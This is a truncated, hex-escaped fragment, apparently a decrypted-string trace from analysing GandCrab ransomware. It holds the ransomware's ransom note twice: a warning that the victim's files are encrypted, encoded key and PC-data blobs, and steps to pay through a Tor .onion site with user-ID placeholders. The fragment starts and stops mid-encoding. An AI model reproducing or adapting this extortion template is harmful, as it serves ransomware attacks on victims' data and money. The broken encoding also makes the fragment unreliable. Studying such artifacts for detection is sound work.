\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x7b\x56\x7d\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x7b\x45\x58\x54\x45\x4e\x53\x49\x4f\x4e\x7d\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x7b\x55\x53\x45\x52\x49\x44\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\